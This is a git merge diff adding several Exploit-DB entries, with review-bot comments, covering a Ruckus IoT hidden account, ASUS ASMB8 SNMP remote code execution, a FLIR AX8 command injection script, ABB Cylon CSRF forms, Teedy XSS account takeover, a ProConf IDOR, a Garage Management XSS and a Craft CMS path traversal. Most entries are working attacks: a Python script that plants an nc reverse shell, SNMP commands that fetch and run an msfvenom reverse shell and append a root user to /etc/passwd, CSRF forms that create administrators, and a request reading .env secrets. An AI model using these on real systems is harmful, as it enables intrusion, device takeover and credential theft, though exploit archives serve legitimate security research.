Merge remote-tracking branch 'exploitdb/main'
commit 682b78fb31
24 changed files with 1845 additions and 1 deletions
110
exploits/hardware/local/52242.txt
Normal file
@ -0,0 +1,110 @@
# Exploit Title: CommScope Ruckus IoT Controller 1.7.1.0 - Undocumented Account
# Date: 2021.05.26
# Exploit Author: korelogic
# Vendor Homepage: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
# Affected Product: Ruckus IoT Controller
# Version: 1.7.1.0 and earlier
# Tested on: Linux
# CVE : CVE-2021-33216,CVE-2019-1000018


KL-001-2021-007: CommScope Ruckus IoT Controller Undocumented Account
Advisory ID: KL-001-2021-007
Publication Date: 2021.05.26
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2021-007.txt
1. Vulnerability Details
Affected Vendor: CommScope
Affected Product: Ruckus IoT Controller
Affected Version: 1.7.1.0 and earlier
Platform: Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-912: Hidden Functionality
CVE ID: CVE-2021-33216
2. Vulnerability Description
An upgrade account is included in the IoT Controller OVA that
provides the vendor undocumented access via Secure Copy (SCP).
3. Technical Description
Once the OVA is imported into VirtualBox, a VMDK file is
created. The VMDK file can be mounted and the directory
structure and its contents can be perused.
An authorized_keys file exists that allows an
individual/organization possessing the SSH private key to
access the virtual appliance using the 'vriotiotupgrade'
account. The 'vriotiotupgrade' account is restricted to scp,
per the rssh configuration.
Additionally, it appears that the IoT Controller has rssh version 2.3.4
installed and in use. At the time of this advisory, there are at least
three remote command injection vulnerabilities in this particular version
of rssh: CVE-2019-3463, CVE-2019-3464 and CVE-2019-1000018.
4. Mitigation and Remediation Recommendation
The vendor has released an updated firmware (1.8.0.0) which
remediates the described vulnerability. Firmware and release
notes are available at:
https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
5. Credit
This vulnerability was discovered by Jim Becher (@jimbecher)
of KoreLogic, Inc.
6. Disclosure Timeline
2021.03.30 - KoreLogic submits vulnerability details to
CommScope.
2021.03.30 - CommScope acknowledges receipt and the intention
to investigate.
2021.04.06 - CommScope notifies KoreLogic that this issue,
along with several others reported by KoreLogic,
will require more than the standard 45 business
day remediation timeline.
2021.04.06 - KoreLogic agrees to extend disclosure embargo if
necessary.
2021.04.30 - CommScope informs KoreLogic that remediation for
this vulnerability will be available inside of the
standard 45 business day timeline. Requests
KoreLogic acquire CVE number for this
vulnerability.
2021.05.14 - 30 business days have elapsed since the
vulnerability was reported to CommScope.
2021.05.17 - CommScope notifies KoreLogic that the patched
version of the firmware will be available the week
of 2021.05.24.
2021.05.19 - KoreLogic requests CVE from MITRE.
2021.05.19 - MITRE issues CVE-2021-33216.
2021.05.25 - CommScope releases firmware 1.8.0.0 and associated
advisory.
2021.05.26 - KoreLogic public disclosure.
7. Proof of Concept
With the VMDK file mounted at the current working directory:
$ find . -name authorized_keys
./VRIOT/ap-images/authorized_keys
./VRIOT/ops/ap-images/authorized_keys
$ cat VRIOT/ap-images/authorized_keys
ssh-rsa
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
chandini.venkatesh@commscope.com
$ cat VRIOT/ops/ap-images/authorized_keys
ssh-rsa
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
chandini.venkatesh@commscope.com
$ grep "ap-images" etc/passwd
vriotiotupgrade:x:1002:1002::/VRIOT/ap-images/:/usr/bin/rssh
$ tail -8 etc/ssh/sshd_config
Match User vriotiotupgrade
PasswordAuthentication no
AuthorizedKeysFile /VRIOT/ap-images/authorized_keys
Match User vriotha
PasswordAuthentication yes
$ grep -v ^# etc/rssh.conf
logfacility = LOG_USER
allowscp
umask = 022
The contents of this advisory are copyright(c) 2021
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
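Review bot: the `# CVE :` header line lists CVE-2019-1000018 next to CVE-2021-33216, but section 1 assigns only CVE-2021-33216 to this advisory, and section 3 names CVE-2019-1000018 as one of three pre-existing rssh 2.3.4 issues together with CVE-2019-3463 and CVE-2019-3464. Either list all three rssh CVEs in the header or drop them, and state that they belong to the bundled rssh component rather than to the undocumented account itself, so that anyone triaging the entry by CVE number is not misled. Section 4 also only points at the vendor PDF; a one-line statement that 1.8.0.0 removes the `vriotiotupgrade` account and its `authorized_keys` entry (or whatever the release notes actually say) would let an operator verify the fix with the same `grep` shown in section 7.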
61
exploits/hardware/local/52244.txt
Normal file
@ -0,0 +1,61 @@
# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)
# Date: 2023-02-16
# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023], SC
# Vendor Homepage: https://servers.asus.com/search?q=ASMB8
# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)
# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl
# CVE: CVE-2023-26602

++++++++++++++++++++
0x00 DESCRIPTION
++++++++++++++++++++
During a recent engagement, a remote server management interface has been
discovered. Furthermore, SNMPv2 was found to be enabled, offering write
access to the private community, subsequently allowing us to introduce
SNMP arbitrary extensions to achieve RCE.
We also found a hardcoded account sysadmin:superuser by cracking the
shadow file (md5crypt) found on the system and identifed an "anonymous"
user w/ the same password, however a lock seems to be in place to prevent
using these credentials via SSH (running defshell as default shell).
+++++++++++++++
0x01 IMPACT
+++++++++++++++
By exploiting SNMP arbitrary extension, we are able to run any command on
the system w/ root privileges, and we are able to introduce our own user
circumventing the defshell restriction for SSH.
+++++++++++++++++++++++++++++++
0x02 PROOF OF CONCEPT (PoC)
+++++++++++++++++++++++++++++++
At first, we have to create required extensions on the system, e.g. via
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'
and if everything is set, we can just run that command by
snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
which will execute our defined command and show us its output.
+++++++++++++++++++++++++++++++
0x03 SSH Remote Root Access
+++++++++++++++++++++++++++++++
The identified RCE can be used to transfer a reverse tcp shell created
by msfvenom for arm little-endian, e.g.
msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin
We can now transfer the binary, adjust permissions and finally run it:
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'
Again, we have to request execution of the lines in the MIB via:
snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
We get a reverse connection from the host, and can now act on the local system
to easily echo our own line into /etc/passwd:
echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd
By setting the standard shell to /bin/sh, we are able to get a SSH root
shell into the system, effectively circumventing the defshell restriction.
$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g
BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown
# uptime
15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25
# head -n 1 /etc/shadow
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::
---
#EOF
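Review bot: the first `snmpbulkwalk` line in section 0x02 uses the placeholder `x.x.x` (three octets) while every other command in the file uses `x.x.x.x`, so that line has a typo and should be made consistent. The entry also carries no fix or mitigation information at all: the header gives a vendor search URL rather than an advisory, no patched firmware version is named, and there is no remediation section even though the description itself identifies the two root causes (a writable `private` SNMPv2 community and a default `sysadmin:superuser` credential pair). A short line stating whether ASUS has issued a fix, and in the meantime that the write community should be disabled or renamed, SNMP restricted to the management network, and the default password changed, belongs in the file so that operators reading the entry know what to do.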
171
exploits/hardware/remote/52246.py
Executable file
File diff suppressed because one or more lines are too long
82
exploits/hardware/webapps/52240.py
Executable file
@ -0,0 +1,82 @@
# Exploit Title: FLIR AX8 1.46.16 - Remote Command Injection
# Date: 8/19/2022
# Exploit Author: Samy Younsi Naqwada (https://samy.link), SC
# Vendor Homepage: https://www.flir.com/
# Software Link: https://www.flir.com/products/ax8-automation/
# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok
# Version: 1.46.16 and under.
# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)
# CVE : CVE-2022-37061

from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3

urllib3.disable_warnings()

def banner():
flirLogo = """
███████╗██╗ ██╗██████╗
██╔════╝██║ ██║██╔══██╗
█████╗ ██║ ██║██████╔╝
██╔══╝ ██║ ██║██╔══██╗
██║ ███████╗██║██║ ██║
╚═╝ ╚══════╝╚═╝╚═╝ ╚═╝
.---------------------.
█████╗ ██╗ ██╗ █████╗ /--'--.------.--------/|
██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] ||
███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' ||
██╔══██║ ██╔██╗ ██╔══██╗ | |( () )| ||
██║ ██║██╔╝ ██╗╚█████╔╝ | | `--` | |/
╚═╝ ╚═╝╚═╝ ╚═╝ ╚════╝ `-------`------`------`
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m
\033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(flirLogo))

def pingWebInterface(RHOST, RPORT):
url = 'http://{}:{}/login/'.format(RHOST, RPORT)
response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
try:
if response.status_code != 200:
print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
version = soup.find('p', id='login-title').string
print('[INFO] {} detected.'.format(version))
except:
print('[ERROR] Can\'t grab the device version...')

def execReverseShell(RHOST, RPORT, LHOST, LPORT):
url = 'http://{}:{}/res.php'.format(RHOST, RPORT)
payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LHOST)
data = 'action=alarm&id=2;{}'.format(payload)
headers = {
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
}
try:
print('[INFO] Executing reverse shell...')
response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)
print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))
return
except Exception as e:
print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT)
return False

def main():
banner()
parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)
parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)
parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
args = parser.parse_args()
pingWebInterface(args.RHOST, args.RPORT)
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)

if __name__ == "__main__":
main()
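Review bot: the `except Exception as e` branch of `execReverseShell` applies `.format(LHOST, LPORT)` to the return value of `print(...)`, which is `None`, so the error path itself raises `AttributeError` instead of printing its message and returning `False`; the call belongs inside the parentheses, i.e. `print('... {}:{}'.format(LHOST, LPORT))`. In `pingWebInterface` the `requests.get(...)` call sits outside the `try`, so a timeout or refused connection surfaces as a raw traceback rather than the friendly "not reachable" message, and the bare `except:` should name what it intends to catch (`AttributeError` when `login-title` is absent, `UnicodeDecodeError`) instead of hiding every failure. `import json` is unused, `e` is bound but never used, and `exit()` should be `sys.exit(1)` so the script returns a non-zero status on failure. Finally, the entry never says whether FLIR has released a fixed firmware; a `# Fix:` line or an explicit "no vendor fix at time of writing" is missing.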
117
exploits/multiple/hardware/52231.html
Normal file
@ -0,0 +1,117 @@
<html>
<!--

ABB Cylon Aspect 3.08.02 (userManagement.php) Cross-Site Request Forgery


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.

Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2024-5870
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5870.php
CVE ID: CVE-2024-48846
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48846


21.04.2024

-->




P R O J E C T

.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░



// Add User/Admin
<body>
<form action="http://192.168.73.31/userManagement.php" method="POST">
<input type="hidden" name="USER" value="zeroscience" />
<input type="hidden" name="PASSWORD" value="ZSL251" />
<input type="hidden" name="ACTION" value="Add" />
<input type="submit" value="Make me a prince! (php)" />
</form>
</body>


// Add User/Admin
<body>
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input type="hidden" name="newuser" value="test" />
<input type="hidden" name="password" value="test123" />
<input type="hidden" name="passwordConfirm" value="test123" />
<input type="hidden" name="Insert" value="Add" />
<input type="submit" value="Make me a prince! (java)" />
</form>
</body>


// Delete User/Admin
<body>
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input type="hidden" name="user9" value="test" />
<input type="hidden" name="remove9" value="1" />
<input type="hidden" name="totalRows" value="9" />
<input type="hidden" name="Delete" value="Delete" />
<input type="submit" value="Destr0y" />
</form>
</body>

</html>
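Review bot: the file opens three separate `<body>` elements inside one `<html>` and places the `// Add User/Admin` and `// Delete User/Admin` labels as bare text outside any element, which is not well-formed HTML and renders the `//` text on the page; either split the three PoCs into three files or keep a single `<body>` with three forms, and turn the labels into `<!-- -->` comments. Unlike the other entries in this commit, the file also has no `# Exploit Title / # Date / # Version / # CVE` header block, so the exploit-db index has to be derived from the comment block, and the "Affected version" line lists product series while the numeric version sits under "Firmware". Nothing in the file says whether ABB has issued a fixed firmware or what the remedy is (a per-request anti-CSRF token on `userManagement.php` and the `UserManager` servlet, plus `SameSite` on the session cookie), so a Fix or Solution line is missing.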
56
exploits/multiple/webapps/52228.txt
Normal file
@ -0,0 +1,56 @@
# Exploit Title: Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)
# Exploit Author: Ayato Shitomi @ Fore-Z co.ltd
# Demo Video: https://www.youtube.com/watch?v=udQgVogsmhA
# Vendor Homepage: https://teedy.io/
# Software Link: https://github.com/Tomblib0/Teedy
# Version: 1.11
# Tested on: Linux
# CVE : CVE-2024-46278

There is a vulnerability that causes XSS when downloading files.
XSS vulnerability could allow a Teedy administrator to rob an account with a few clicks.


Login as an attacker’s account.
Upload this file as html type. You have to change “Origin” and “Referer” and argument for fetch in need.

```
<script>
const currentCookie = document.cookie;

const requestOptions = {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Accept': 'application/json, text/plain, */*',
'Cookie': currentCookie,
'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
'sec-ch-ua-platform': '"Linux"',
'Origin': 'http://localhost:8080',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'http://localhost:8080/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9'
},
body: 'password=superSecure2&passwordconfirm=superSecure2'
};

fetch('http://localhost:8080/api/user', requestOptions)
.then(response => {
if (!response.ok) {
throw new Error('Network response was not ok');
}
document.write('<h1>Your account was taken over by the attacker LOL</h1>');
return response.json();
})
.then(data => console.log(data))
.catch(error => console.error('There was a problem with your fetch operation:', error));
</script>
```

Login with another account. eg. admin
Click on the file uploaded by the attacker and select Download this file.
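Review bot: the header block is missing the `# Date:` line that every other entry in this commit carries, and the description never states the root cause, presumably that the "Download this file" action serves the uploaded HTML inline under the Teedy origin instead of as an attachment; without that sentence a maintainer cannot tell what the fix must change (forcing `Content-Disposition: attachment`, or serving user uploads from a separate origin, would each close it) and a reader cannot tell which requests to look for in the access log. The instruction "You have to change 'Origin' and 'Referer' and argument for fetch in need" should also say plainly that `http://localhost:8080` is a placeholder for the instance's base URL, and the final two steps would be clearer as a numbered list matching the numbered steps used elsewhere in the file.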
24
exploits/multiple/webapps/52236.txt
Normal file
@ -0,0 +1,24 @@
# Exploit Title: ProConf 6.0 - Insecure Direct Object Reference (IDOR)
# Date: 19/07/2018
# Exploit Author: S. M. Zia Ur Rashid, SC
# Author Contact: https://www.linkedin.com/in/ziaurrashid/
# Vendor Homepage: http://proconf.org & http://myproconf.org
# Version: <= 6.0
# Tested on: Windows
# CVE : CVE-2018-16606
# Patched Version: 6.1

# Description:
In ProConf before 6.1, an Insecure Direct Object Reference (IDOR) allows
any author to view and grab all submitted papers (Title and Abstract) and
their authors' personal information (Name, Email, Organization, and
Position) by changing the value of Paper ID (the pid parameter).

# PROOF-OF-CONCEPT
Step 1: Sign In as an author for a conference & submit a paper. Youall get
a paper ID.
Step 2: Now go to paper details and change the value of Paper ID (param
pid=xxxx) to nearest previous value to view others submitted paper &
authors information.
http:// <http:>
[host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx
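Review bot: "Youall get a paper ID" in Step 1 is a mangled "You'll get a paper ID", and the PoC URL at the end is broken across two lines with a stray `<http:>` fragment from a mail client; it should read as one line, `http://[host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx`. Since the header already names 6.1 as the patched version, Step 2 would be more useful to a verifier if it also stated the expected post-fix behaviour (an error or redirect when `pid` does not belong to the logged-in author), because that is exactly the authorization check the fix has to pass and the condition an operator would test after upgrading.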
37
exploits/multiple/webapps/52238.txt
Normal file
@ -0,0 +1,37 @@
# Exploit Title: Garage Management System 1.0 (categoriesName) - Stored XSS
# Date: 18-09-2022
# Exploit Author: Sam Wallace, SC
# Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2022-41358

Summary:
Garage Management System utilizes client side validation to prevent XSS.
Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.
Parameter: categoriesName
URI: /garage/php_action/createCategories.php
POC:
POST /garage/php_action/createCategories.php HTTP/1.1
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"
<script>alert(1)</script>
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"
1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"
------WebKitFormBoundaryqKDsN4gmatTEEkhS--
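Review bot: the PoC shows the injection request to `createCategories.php` but never names the sink, i.e. which page renders the stored `categoriesName` value without output encoding so that the `alert(1)` fires, and whether it fires for every user who views the category list or only for the administrator; without that, neither a verifier nor the maintainer can confirm a fix, and a defender cannot tell which rendering path to review. The summary's observation that the validation is client-side only is the real finding and should be stated as the root cause with the corresponding remedy: the server must HTML-encode `categoriesName` on output (and validate it on input), because any browser-side check is bypassed simply by replaying the request, which is all the Burp capture demonstrates. The `Date:` field also uses `18-09-2022` where the other entries use ISO or dotted dates; minor, but worth normalising.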
137
exploits/multiple/webapps/52241.txt
Normal file
@ -0,0 +1,137 @@
# Exploit Title: Ethercreative Logs 3.0.3 - Path Traversal
# Date: 2022.01.26
# Exploit Author: Steffen Rogge, SC
# Vendor Homepage: https://github.com/ethercreative/logs
# Software Link: https://plugins.craftcms.com/logs
# Version: <=3.0.3
# Tested on: Linux
# CVE : CVE-2022-23409

product: Ethercreative Logs plugin for Craft CMS
fixed version: >=3.0.4
impact: Medium
found: 2021-07-06
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"A quick and dirty way to access your logs from inside the CP"
As found on the plugin store page: https://plugins.craftcms.com/logs
Active Installs 4,093 (as of 2021-07-07)
Business recommendation:
------------------------
The vendor provides a patched version v3.0.4 which should be installed immediately.
Vulnerability overview/description:
-----------------------------------
1) Authenticated Path Traversal (CVE-2022-23409)
The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside
the backend of the CMS. As the requested logfile is not properly validated, an attacker is
able to request arbitrary files from the underlying file system with the permissions of the
web service user.
Proof of concept:
-----------------
1) Authenticated Path Traversal (CVE-2022-23409)
As the plugin is installed as an administrator of the system and the function is only accessible
after being logged in as an admin, an attacker needs to be authenticated as an administrator in
the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request.
The vulnerable endpoint is provided by the plugin under the following path:
https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream
The vulnerable controller for that endpoint can be found here:
https://github.com/ethercreative/logs/blob/master/src/Controller.php
The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input
values before file content is being read by the function "file_get_contents".
public function actionStream ()
{
$logsDir = \Craft::getAlias('@storage/logs');
$logFile = \Craft::$app->request->getParam('log');
$currentLog = \Craft::$app->request->get('log', $logFile);
$log = file_get_contents($logsDir . '/' . $currentLog);
exit($log);
}
A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem
with rights as the user executing the web server. In most cases this will be the user "www-data".
In order to read the file ".env" or ".env.php" which contains the environment configuration and as
such also the database credentials, the following request can be used:
GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Connection: close
Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=<identity_cookie>;
The response then discloses the file content of the file ".env":
HTTP/1.1 200 OK
Date: Thu, 07 Jul 2021 10:08:52 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly
Content-Length: 1600
Connection: close
[...]
$craftEnvVars = [
'DB_DRIVER' => 'mysql',
'DB_SERVER' => '********',
'DB_USER' => '********',
'DB_PASSWORD' => '********',
'DB_DATABASE' => '********',
'DB_SCHEMA' => 'public',
'DB_TABLE_PREFIX' => '',
'DB_PORT' => '********',
'SECURITY_KEY' => '********',
[...]
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available at the time
of the test:
* Version 3.0.3 released on November 25, 2019
Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs
Vendor contact timeline:
------------------------
2021-07-07: Contacting vendor through dev@ethercreative.co.uk
2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible
for any risks involved with plaintext communication
2021-07-08: Advisory was sent to vendor unencrypted
2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4
(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4)
2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation
(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4)
2022-01-24: Release of security advisory
Solution:
---------
The vendor released a patched version 3.0.4 or higher which can be retrieved from their
website/github:
https://plugins.craftcms.com/logs
https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4
Workaround:
-----------
Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services.
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
